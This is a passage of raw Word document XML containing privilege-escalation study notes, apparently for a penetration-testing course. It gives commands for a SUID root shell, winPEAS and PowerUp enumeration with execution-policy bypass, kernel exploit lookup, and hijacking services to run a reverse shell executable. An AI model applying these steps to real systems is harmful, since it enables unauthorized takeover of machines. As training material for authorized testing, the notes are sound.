      <w:r w:rsidR="00DE0A6B">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE0A6B">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>’ FULLBINARYPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FCDFF" w14:textId="7FD3099D" w:rsidR="00DE0A6B" w:rsidRDefault="00DE0A6B" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E24C006" w14:textId="79F0E6C9" w:rsidR="00DE0A6B" w:rsidRDefault="00DE0A6B" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D2B8EA" w14:textId="72699E41" w:rsidR="00230716" w:rsidRPr="00230716" w:rsidRDefault="00230716" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230716">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Interesting files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43940A71" w14:textId="7C756E5A" w:rsidR="00230716" w:rsidRDefault="00230716" w:rsidP="00CB2C86">
      <w:r>
        <w:t>If there are files that we can run as a higher privileged user, view it and see if anything the program does can be abused. For example, a python script imports a module that we can hijack (look at python path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D3696" w14:textId="72D3F851" w:rsidR="00DE0A6B" w:rsidRPr="00DE0A6B" w:rsidRDefault="00DE0A6B" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0A6B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Passwords and keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA2380" w14:textId="6FB21C32" w:rsidR="00DE0A6B" w:rsidRDefault="00DE0A6B" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Lookout for passwords in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> references to credential files (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> private keys or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openvpn’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auth-user-pass config option, for example).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B0375" w14:textId="77777777" w:rsidR="006535B2" w:rsidRDefault="006535B2"/>
    <w:p w14:paraId="70137112" w14:textId="1E10621D" w:rsidR="00E203BD" w:rsidRPr="00915E3B" w:rsidRDefault="00E203BD" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55757175" w14:textId="6EFDFCF8" w:rsidR="0068185A" w:rsidRDefault="00063C99">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0068185A">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0068185A">
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0068185A">
        <w:t xml:space="preserve"> /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C6854" w14:textId="31C12728" w:rsidR="008B378C" w:rsidRDefault="008B378C">
      <w:r>
        <w:tab/>
        <w:t>Net user USERNAME       to see which groups the user is part of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7CEB3" w14:textId="45010EEB" w:rsidR="0068185A" w:rsidRDefault="0068185A">
      <w:r>
        <w:tab/>
        <w:t>Tree /f /a</w:t>
      </w:r>
      <w:r w:rsidR="008B378C">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from C:\Users directory</w:t>
      </w:r>
      <w:r w:rsidR="008B378C">
        <w:t xml:space="preserve"> to look for interesting files easily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011E74FF" w14:textId="576A4CE7" w:rsidR="00B35920" w:rsidRDefault="0068185A">
      <w:r>
        <w:t xml:space="preserve">Then run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B186B2D" w14:textId="1322CF77" w:rsidR="00B35920" w:rsidRDefault="000F13BF">
      <w:r>
        <w:tab/>
        <w:t>.\winPEASx64.exe      from c:\windows\temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B913FB" w14:textId="7C6B7AD4" w:rsidR="00890836" w:rsidRDefault="00890836">
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> doesn’t work</w:t>
      </w:r>
      <w:r w:rsidR="00D03CC8">
        <w:t xml:space="preserve"> (first try the .bat)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E956F" w14:textId="64E44171" w:rsidR="00B35920" w:rsidRDefault="00B35920">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -exec bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD682AE" w14:textId="574C5DF9" w:rsidR="00890836" w:rsidRDefault="00890836">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B35920">
        <w:t>. .\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4E8CD" w14:textId="3F490E6E" w:rsidR="00890836" w:rsidRDefault="00890836">
      <w:r>
        <w:tab/>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AllChecks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72EFC2DA" w14:textId="2384C7B5" w:rsidR="00B44D1C" w:rsidRDefault="00B44D1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE3169" w14:textId="4AB0974F" w:rsidR="00243D58" w:rsidRDefault="00243D58">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should tell us the kernel version (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can too) and suggest exploits. Use these or google/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploitdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for others. Run but may need to revert and try something else if it fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A98DA2" w14:textId="71CC44C1" w:rsidR="00476BDA" w:rsidRDefault="00476BDA">
      <w:r>
        <w:t>Check for exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44769B38" w14:textId="4334E520" w:rsidR="00476BDA" w:rsidRDefault="00476BDA">
      <w:r>
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output to kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F46D63D" w14:textId="0B4E782B" w:rsidR="00476BDA" w:rsidRDefault="00476BDA">
      <w:r>
        <w:t xml:space="preserve">The use windows exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C64B1B5" w14:textId="74CC7EDF" w:rsidR="00476BDA" w:rsidRDefault="00476BDA">
      <w:r>
        <w:tab/>
        <w:t>Python2 wes.py systeminfo.txt -I ‘Elevation of Privilege’ –exploits-only | more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C1C02" w14:textId="64CEF937" w:rsidR="00476BDA" w:rsidRDefault="00476BDA">
      <w:r>
        <w:t xml:space="preserve">Cross reference these with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secwiki’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list. If not, look on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploitdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077115F8" w14:textId="35F24A69" w:rsidR="00243D58" w:rsidRDefault="00243D58">
      <w:r>
        <w:t>Pre-compiled exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57038913" w14:textId="77777777" w:rsidR="00243D58" w:rsidRDefault="00243D58" w:rsidP="00243D5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E0DCDC"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>https://github.com/SecWiki/windows-kernel-exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB361E" w14:textId="42541425" w:rsidR="00243D58" w:rsidRDefault="00034E76" w:rsidP="00243D5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E0DCDC"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00243D58" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>https://github.com/abatchy17/WindowsExploits</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E5A15C7" w14:textId="1183CF97" w:rsidR="00243D58" w:rsidRPr="00243D58" w:rsidRDefault="00243D58" w:rsidP="00243D5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E0DCDC"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>https://github.com/rasta-mouse/Watson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53997237" w14:textId="19193A34" w:rsidR="00B44D1C" w:rsidRPr="006D7F1B" w:rsidRDefault="00B44D1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00615F1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Services information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1167782F" w14:textId="019C5C03" w:rsidR="00AF291B" w:rsidRPr="006D7F1B" w:rsidRDefault="00AF291B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak service permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1213D916" w14:textId="344D37EE" w:rsidR="00636528" w:rsidRDefault="00636528">
      <w:r>
        <w:t xml:space="preserve">Identify with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25351ADD" w14:textId="6C8336F8" w:rsidR="00636528" w:rsidRDefault="00636528">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E0BA4A" wp14:editId="623069E9">
            <wp:extent cx="3858491" cy="1669761"/>
            <wp:effectExtent l="0" t="0" r="889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75206" cy="167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ED3A1" w14:textId="5ED171A4" w:rsidR="00636528" w:rsidRDefault="00636528">
      <w:r>
        <w:t xml:space="preserve">Confirm with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accesschk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24017F97" w14:textId="07F2654F" w:rsidR="00636528" w:rsidRDefault="00636528">
      <w:r>
        <w:tab/>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwcqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> USER SERVICENAME </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02A033" w14:textId="63058C3A" w:rsidR="00B44D1C" w:rsidRDefault="00B44D1C">
      <w:r>
        <w:t>Must be able to start the service</w:t>
      </w:r>
      <w:r w:rsidR="00AF291B">
        <w:t xml:space="preserve"> (and stop if running – check with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF291B">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF291B">
        <w:t xml:space="preserve"> query SERVICENAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E17AFD" w14:textId="38805F1C" w:rsidR="00AF291B" w:rsidRDefault="00AF291B">
      <w:r>
        <w:t>Then exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD80B3" w14:textId="0DB3B89D" w:rsidR="00AF291B" w:rsidRDefault="00AF291B">
      <w:r>
        <w:tab/>
        <w:t>Listen on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599D4F5" w14:textId="40A67ED8" w:rsidR="00AF291B" w:rsidRDefault="00AF291B">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sc stop    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>if running)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21916C7F" w14:textId="65634802" w:rsidR="00AF291B" w:rsidRDefault="00AF291B">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sc config SERVICENAME </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>binpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>= “FULLPATH\reverse.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80551F" w14:textId="66828022" w:rsidR="00760FFE" w:rsidRDefault="00AF291B">
      <w:r>
        <w:tab/>
        <w:t>Sc start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A762A" w14:textId="7366F6B0" w:rsidR="00AF291B" w:rsidRPr="006D7F1B" w:rsidRDefault="00AF291B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unquoted service paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012A470" w14:textId="0D1FE856" w:rsidR="00AF291B" w:rsidRDefault="00AF291B">
      <w:r>
        <w:t xml:space="preserve">Identify with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C20D282" w14:textId="3572A369" w:rsidR="00AF291B" w:rsidRDefault="00AF291B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6915A04D" wp14:editId="35450F8F">
            <wp:extent cx="4094018" cy="1106283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34419" cy="111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C78A7" w14:textId="77777777" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:t xml:space="preserve">Confirm with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accesschk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52ED77D5" w14:textId="77777777" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwcqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> USER SERVICENAME </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B060F" w14:textId="77777777" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:t xml:space="preserve">Must be able to start the service (and stop if running – check with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query SERVICENAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C46BED" w14:textId="68617E65" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:t xml:space="preserve">Then check which directory we can write in, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="082FCA9E" w14:textId="0CCCC701" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwdq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “C:\”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB2298" w14:textId="4B2DAE98" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwdq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “C:\Program Files\”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2085B7" w14:textId="55F15C66" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwdq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “C:\Program Files\Unquoted Path Service\”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27728B00" w14:textId="73586230" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:t>Looking to see users in output and use that one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBB7B6" w14:textId="5CB8E9F5" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:t>Then exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF431B9" w14:textId="1A7CDDD9" w:rsidR="00CB34A1" w:rsidRDefault="00CB34A1" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Listen on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798D7F2B" w14:textId="41B167D9" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Sc stop SERVICENAME (if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD71472" w14:textId="40F4A7B9" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Copy reverse.exe (from SMB if needed) to the directory and rename it accordingly, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABDC832" w14:textId="2269AE7D" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
      <w:r w:rsidR="006C78E6">
        <w:t>FULLPATH\</w:t>
      </w:r>
      <w:r>
        <w:t>reverse.exe “C:\Program Files\Unquoted Path Service\Common.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26767ACE" w14:textId="6F851987" w:rsidR="0028111A" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Sc start SERVICENAME</w:t>
      </w:r>
      <w:r w:rsidR="004E6F2F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E6F2F">
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E6F2F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E6F2F">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E6F2F">
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E6F2F">
        <w:t>unquotedsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36312D58" w14:textId="13613DE9" w:rsidR="0028111A" w:rsidRPr="006D7F1B" w:rsidRDefault="0028111A" w:rsidP="0028111A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7F1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak registry permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1490BFA1" w14:textId="130DE305" w:rsidR="0028111A" w:rsidRDefault="004E6F2F" w:rsidP="0028111A">
      <w:r>
        <w:t xml:space="preserve">Identify with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16CAF409" w14:textId="649C9AA6" w:rsidR="004E6F2F" w:rsidRDefault="004E6F2F" w:rsidP="0028111A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F0B353F" wp14:editId="5D42BEBF">
            <wp:extent cx="5731510" cy="4394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5B668" w14:textId="365397A5" w:rsidR="004E6F2F" w:rsidRDefault="007255C9" w:rsidP="0028111A">
      <w:r>
        <w:t xml:space="preserve">Confirm with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accesschk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FED72D4" w14:textId="63D577F7" w:rsidR="007255C9" w:rsidRDefault="007255C9" w:rsidP="0028111A">
      <w:r>
        <w:tab/>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
